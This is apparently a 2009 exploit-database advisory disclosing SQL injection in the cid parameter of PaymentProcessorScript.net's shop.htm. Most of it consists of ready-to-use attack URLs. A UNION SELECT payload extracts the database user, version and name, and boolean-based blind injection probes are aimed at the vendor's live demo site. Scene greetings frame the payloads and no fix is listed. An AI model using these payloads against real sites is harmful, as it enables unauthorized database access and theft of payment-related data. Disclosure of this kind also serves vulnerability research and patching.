Payment Processor Script (shop.htm cid) SQL Injection Vulnerability

2009-08-03 23:33:29

[~] PaymentProcessorScript.net R-Sql/B-Sql Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 04.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

R-Sql

http://z0rlu.blogspot.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

B-Sql

http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=1 true

http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=100 false

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=1

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=100


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.